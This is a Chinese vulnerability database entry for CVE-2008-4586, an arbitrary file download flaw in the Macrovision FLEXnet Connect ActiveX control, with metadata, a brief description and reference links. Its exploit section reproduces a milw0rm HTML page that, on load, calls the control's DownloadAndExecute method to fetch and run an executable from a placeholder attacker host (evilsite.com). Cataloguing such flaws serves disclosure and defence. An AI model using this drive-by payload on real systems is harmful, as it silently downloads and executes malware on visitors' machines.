Macrovision FLEXnet Connect ActiveX控件任意文件下载漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114316 漏洞类型 其他
发布时间 2008-01-15 更新时间 2009-01-29
CVE编号 CVE-2008-4586 CNNVD-ID CNNVD-200810-281
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/4913
https://cxsecurity.com/issue/WLB-2008100176
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-281
|漏洞详情
MacrovisionFLEXnetConnect是一种应用软件的厂商为用户提供产品相关的更新及信息发布的工具。FLEXnetConnect的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞下载任意文件到用户系统。
|漏洞EXP
<!-- 
Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
Implemented Categories:
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, isusweb.dll version 6.1.100.61372 
-->
<html>
 <head>
  <title>Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     	      							  obj.DownloadAndExecute("Bla","{11111111-1111-1111-1111-111111111111}",0,"http://www.evilsite.com/evil.exe","evil.exe");           
          
    } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:1DF951B1-8D40-4894-A04C-66AD824A0EEF" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-15]
|参考资料

来源:VUPEN
名称:ADV-2008-0145
链接:http://www.vupen.com/english/advisories/2008/0145
来源:BID
名称:27279
链接:http://www.securityfocus.com/bid/27279
来源:MILW0RM
名称:4913
链接:http://www.milw0rm.com/exploits/4913
来源:SREASON
名称:4425
链接:http://securityreason.com/securityalert/4425
来源:SECUNIA
名称:28496
链接:http://secunia.com/advisories/28496